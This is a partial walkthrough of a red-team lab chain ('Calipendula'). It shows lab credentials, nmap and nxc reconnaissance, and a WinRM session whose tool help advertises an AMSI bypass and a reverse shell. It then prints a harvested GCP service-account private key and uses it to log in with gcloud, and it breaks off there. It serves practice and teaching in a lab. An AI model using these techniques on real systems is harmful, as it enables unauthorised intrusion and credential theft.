Overview
- Type Chains
- Direct https://extremeredlab.0x29a.it/chains
- OS Windows/Linux
- Severity Medium
- Target 10.0.9.0/24
Information
In this lab, you won’t just face vulnerabilities — you’ll walk a hidden path, where someone is pulling strings behind the scenes. Their actions are subtle, but their presence is undeniable.
Something — or someone — is at work. To move forward, you’ll have to pass through the clouds: ambiguity, noise, and deliberate misdirection. Nothing will be clear.
Every step will demand sharp instincts, patience, and a willingness to get lost before you find your way. But beyond the fog lies their partner — elusive, essential, and waiting.
If you can find them, earn their trust — or take control — you’ll gain the strength to turn the tide.
Together, you may just overpower the enemy who watches, anticipates, and thrives in the uncertainty.
Will you uncover the hidden alliance? Or will you vanish into the mist, just another ghost in the system?
Instructions
To access the lab, you can start a VPN session, and connect to the jump Kali machine with the following credentials, it’s all you need:
VPN:
- 🔹 Get your VPN connection in the
ask-vpn-for-labschannel by using the!getvpncommand.
Kali Jump machine:
- 🔹 Server: 10.0.9.200
- 🔹 User: red
- 🔹 Password: I’mthebest
AD Credentials:
- 🔹 User: red@calipendula.loc
- 🔹 Password: CaliLab0%
Your Target: 10.0.9.0/24
Please acknowledge that you read this message.
————— NOTE ———————————- This Red Teaming lab is pretty easy
- the final flag changes every hour
- It is not necessary (but you can try) to become a Domain Admin of the Active Directory domains.
- No privilege escalation is required on Linux computers.
- Many systems act as bridges to access other systems.
- Many systems contain secrets that will help you reach other systems.
- Follow the ethical guidelines of a Red Teamer: keep all systems clean, and do not leave programs or files behind that could assist other competitors.
- The Kali machine is only for jumping; you don’t need to perform Privilege Escalation.
- NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB
- NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB
- NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB
————— NOTE ———————————-
We strongly encourage you to work like a true Red Teamer and avoid leaving tools or traces that could assist other participants.
Enjoy the adventure!
CALIPENDULA
Grab our VPN package via Discord, then start it and let’s go:
$ sudo openvpn Downloads/EXTREME_RTLAB/user_978857802405675029.ovpn
$ sudo ip link set dev tun0 mtu 1350
Nmap
$ sshpass -p "I'mthebest" ssh -o 'StrictHostKeyChecking=accept-new' -o 'StrictHostKeyChecking=no' red@10.0.9.200
red@start:~$ cd /tmp/
red@start:/tmp$ mkdir .1
red@start:/tmp$ cd .1
red@start:/tmp/.1$ nmap -sn --min-rate=1000 -T4 10.0.9.0/24 -oN target_network.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:18 EDT
Nmap scan report for 10.0.9.10
Host is up (0.0013s latency).
MAC Address: 00:15:5D:38:01:23 (Microsoft)
Nmap scan report for 10.0.9.20
Host is up (0.0014s latency).
MAC Address: 00:15:5D:38:01:24 (Microsoft)
Nmap scan report for 10.0.9.116
Host is up (0.00086s latency).
MAC Address: 00:15:5D:38:01:10 (Microsoft)
Nmap scan report for 10.0.9.200
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 0.80 seconds
Found 4 hosts:
- 10.0.9.10
- 10.0.9.20
- 10.0.9.116
- 10.0.9.200 (already known as it’s our current Jumb box)
red@start:/tmp/.1$ nmap -Pn -p- --min-rate=5000 10.0.9.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:46 EDT
Nmap scan report for 10.0.9.10
Host is up (0.00051s latency).
All 65535 scanned ports on 10.0.9.10 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
MAC Address: 00:15:5D:38:01:23 (Microsoft)
red@start:/tmp/.1$ nmap -sCV -Pn -p- --min-rate=2000 -T4 10.0.9.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:42 EDT
Nmap scan report for 10.0.9.20
Host is up (0.00023s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:15:5D:38:01:24 (Microsoft)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: ACTARUS, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:38:01:24 (Microsoft)
| smb2-time:
| date: 2025-08-30T03:44:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -3s
$ nxc smb 10.0.9.20
SMB 10.0.9.20 445 ACTARUS [*] Windows 10 / Server 2019 Build 19041 x64 (name:ACTARUS) (domin:calipendula.loc) (signing:False) (SMBv1:False)
Add
actarus.calipendula.loc,calipendula.locin in /etc/hosts
red@start:/tmp/.1$ nmap -sCV -Pn -p- --min-rate=2000 -T4 10.0.9.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:45 EDT
Nmap scan report for 10.0.9.116
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9p1 Debian 3 (protocol 2.0)
| ssh-hostkey:
| 256 b4:75:83:96:b5:5d:e1:ef:2f:fd:1c:af:92:f1:f0:07 (ECDSA)
|_ 256 4b:90:66:a2:39:8c:78:04:e7:a0:93:8d:d9:62:92:43 (ED25519)
MAC Address: 00:15:5D:38:01:0E (Microsoft)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ACTARUS
Enumeration
$ nxc smb 10.0.9.20 -d calipendula.loc -u 'red' -p 'CaliLab0%' --shares
SMB 10.0.9.20 445 ACTARUS [*] Windows 10 / Server 2019 Build 19041 x64 (name:ACTARUS) (domin:calipendula.loc) (signing:False) (SMBv1:False)
SMB 10.0.9.20 445 ACTARUS [+] calipendula.loc\red:CaliLab0%
SMB 10.0.9.20 445 ACTARUS [*] Enumerated shares
SMB 10.0.9.20 445 ACTARUS Share Permissions Remark
SMB 10.0.9.20 445 ACTARUS ----- ----------- ------
SMB 10.0.9.20 445 ACTARUS ADMIN$ Remote Admin
SMB 10.0.9.20 445 ACTARUS C$ Default share
SMB 10.0.9.20 445 ACTARUS IPC$ READ Remote IPC
Nothing.
$ python3 winrmexec/evil_winrmexec.py 'calipendula.loc/red:CaliLab0%@actarus.calipendula.loc'
[*] '-target_ip' not specified, using actarus.calipendula.loc
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://actarus.calipendula.loc:5985/wsman
Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
inputs from stdin, or exploits that spawn cmd.exe, etc., pop a !revshell
Special !bangs:
!download RPATH [LPATH] # downloads a file or directory (as a zip file); use 'PATH'
# if it contains whitespace
!upload [-xor] LPATH [RPATH] # uploads a file; use 'PATH' if it contains whitespace, though use iwr
# if you can reach your ip from the box, because this can be slow;
# use -xor only in conjunction with !psrun/!netrun
!amsi # amsi bypass, run this right after you get a prompt
!psrun [-xor] URL # run .ps1 script from url; uses ScriptBlock smuggling, so no !amsi patching is
# needed unless that script tries to load a .NET assembly; if you can't reach
# your ip, !upload with -xor first, then !psrun -xor 'c:\foo\bar.ps1' (needs absolute path)
!netrun [-xor] URL [ARG] [ARG] # run .NET assembly from url, use 'ARG' if it contains whitespace;
# !amsi first if you're getting '...program with an incorrect format' errors;
# if you can't reach your ip, !upload with -xor first then !netrun -xor 'c:\foo\bar.exe' (needs absolute path)
!revshell IP PORT # pop a revshell at IP:PORT with stdin/out/err redirected through a socket; if you can't reach your ip and you
# you need to run an executable that expects input, try:
# PS> Set-Content -Encoding ASCII 'stdin.txt' "line1`nline2`nline3"
# PS> Start-Process some.exe -RedirectStandardInput 'stdin.txt' -RedirectStandardOutput 'stdout.txt'
!log # start logging output to winrmexec_[timestamp]_stdout.log
!stoplog # stop logging output to winrmexec_[timestamp]_stdout.log
PS C:\Users\red\Documents>
Quick check for his privileges:
PS C:\Users\red\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Check the users who have accessed to this server:
PS C:\Users\red\Documents> cd ../..
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/14/2025 11:27 PM Administrator
d----- 8/26/2025 5:21 AM alcor
d----- 6/14/2025 11:27 PM fox
d-r--- 4/20/2025 1:38 AM Public
d----- 7/14/2025 1:23 PM red
d----- 6/14/2025 11:27 PM tasko
Interesting as seems it’s protected by Kaspersky AV:
PS C:\Users> cd c:\programdata
PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/20/2025 3:06 AM Kaspersky Lab
d---s- 4/20/2025 1:40 AM Microsoft
d----- 6/10/2025 3:03 AM Microsoft OneDrive
d----- 4/20/2025 5:32 AM Packages
d----- 8/29/2025 11:26 PM regid.1991-06.com.microsoft
d----- 12/7/2019 1:14 AM SoftwareDistribution
d----- 5/5/2023 5:27 AM ssh
d----- 6/19/2025 10:18 PM urck
d----- 4/20/2025 10:33 AM USOPrivate
d----- 12/7/2019 1:14 AM USOShared
d----- 12/7/2019 1:54 AM WindowsHolographicDevices
-a---- 6/10/2025 2:56 AM 8 a
-a---- 5/9/2025 2:12 AM 0 Kaspersky.exe
PS C:\programdata> dir "Kaspersky Lab"
Directory: C:\programdata\Kaspersky Lab
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/12/2025 8:44 PM AVP21.20
d----- 4/20/2025 3:06 AM SafeBrowser
d----- 6/14/2025 11:20 PM UCPStorage
Found: Kaspersky Endpoint Security service (AVP.KES.21.20) with a pretty updated version (2025 July)
Continue the enumeration and we found an interesting file in our Downloads folder:
PS C:\Users\red\Downloads> type calipendula-lab-106427aef42d7.json
{
"type": "service_account",
"project_id": "calipendula-lab",
"private_key_id": "06427aef42d7237f828be45b5bdcdb46ab7f6384",
"private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDy9zmD2Z0FStSB\nDAYg2kAnIwX4zaFwSvp4qAx65VvgHXg+fhdHg9v2zE0xBr54PY9uAwoCFfgDTmkQ\nWuvDAgCQwmmu7yVs8G0QmxE2HHT6PalEhxLKjYNtmi/bYcv3rk/iknY92zDYJOHJ\nz4D0I7HWWMHdbq2R8iBmGzPuJPqhARjOvaI6EVogdtz8ybkALRi6hlcw9Slej6gq\ngAvJLV8fgawne+7qYg4ikAZ0sNDId0ayewaLApmebHt5bOVGLHeEHgp5QrPFxBLA\nDolK82BY/ELn1mAH411xjMLsKd8BnK5KrBH0vLeAeD15tRaZtXRfv++guBq6FyL2\nFwdozjS1AgMBAAECggEARqV8I8pyzcckYyGL5qGPZdHZOq8P8gbbLZovhsyKGnB3\nNjSTsEe2/dwJ1eeQGoZL3kEj99dLdiqmggrt4pYCdBUThbojt7lw/RMZvhIoMVsc\njMB5xku/m27p23BkTnBw6gCMQRAq865FuNiNNm/qldjZBfnYnkc5BHeEcgpulcGa\n1p4rF969GwZWGmkvJY0HdAsgSuVyKhou5+3+9ZCP7OndRFpqZ9eVYGHRHIAgR1pS\n4JIaMbo/Qejh2HC5wIsWvcCxeyvQhruinGKBFPAvvx1Kign4HibwCI/Etk4/KL2p\nIbrB6ZhqMw62Lh3ZLd5MIJd2L46y5BAZBMsFjCzjQQKBgQD9pk52cABAvGAVqVsh\n4hGtKnZ4iWCLRP1sTHLwKv5fv+GSvw8VdmV9Y2xKhCdYmw1d983jF8TkCmpqm7rp\nUT8JujPjRLR2z1c3F4pA9f3+1xYR4uwxYo3pjgrlSMk0EshrGC+YBi9kE7ZTBMKd\no2LqKTlkqkrM+6RxPUsMRz2YuwKBgQD1N5MLQF6grOjD4HIdsMBS1GFGm3dsqyNq\ne27QxOFUGI/XcZCMCtn/Hx+hTxiqls851Qw29XA1Tq+w+4nCjJ0oBxMAyR6GOYou\nFu4R2ccazL1v5lT7Ki7JcZbAiflrpSVFkd6oTTRJmSGoS9alg3DtiF8d5BdK6Zyl\n1YuSyTCJTwKBgQCClLpyGMjYiuIAZNaIxASLnH+vIDI2oIbC2TyWzdt02ai8TmXq\ni7BF9AhM+Gn1IKWqCafR0GvJZl9QkOmRsgT88gJCbx1kyOtCbnj7ZmijaIFxJdyo\ns+8RHNIZJfaHO2A4WhQudIizQb6sUJgMZY/Hsv9cBptJmgcXURGwuYBJfwKBgAnH\n26+ZM60I+IfHjgWtJR6opfChBtRoxxLaNYNSNwKZsDMRrohHboaEgUh31S4Isd9G\npiQTChS2PL+8aLQ/04zjK1jerL8B0IciFwDTROPGws+RylXySsdyJmcrma03exMZ\nTF4+JhXBa9xAmiEj6v8ub0zL6jnss3jR2a1TJQJ1AoGBAMh8HNjE3rfV97ispHQo\nZDkV5Wi1o2hoWTfBUvaJqevcFpXzT6VvCZEIcOyYekWFsoVgAQd3vuReFhcKYg3G\ngY2pJF41MQSAWuLmf6OmzFLVSFNmpAkENloy0J1U+jiRujaWH6SHm8/6m55q6Vix\n+3TM8xOkgZVikb2Gzq64zVJ7\n-----END PRIVATE KEY-----\n",
"client_email": "calipendulasa@calipendula-lab.iam.gserviceaccount.com",
"client_id": "101977309837071406665",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/calipendulasa%40calipendula-lab.iam.gserviceaccount.com",
"universe_domain": "googleapis.com"
}
Go to GCP
Install the Google Cloud CLI (gcloud) on our Kali Linux:
- Add the Google Cloud SDK distribution URI to your package sources:
$ echo "deb [signed-by=/usr/share/keyrings/cloud.google.gpg] https://packages.cloud.google.com/apt cloud-sdk main" | sudo tee -a /etc/apt/sources.list.d/google-cloud-sdk.list
- Import the Google Cloud public key.
$ sudo apt install apt-transport-https ca-certificates gnupg
$ curl https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo gpg --dearmor -o /usr/share/keyrings/cloud.google.gpg
- Update your package lists and install the gcloud CLI:
$ sudo apt update && sudo apt install google-cloud-cli
- Authenticate to GCP using our JSON file:
$ gcloud auth activate-service-account --key-file=./calipendula-lab-106427aef42d7.json
Activated service account credentials for: [calipendulasa@calipendula-lab.iam.gserviceaccount.com]
NEED SOME FREE TIME TO CONTINUE…
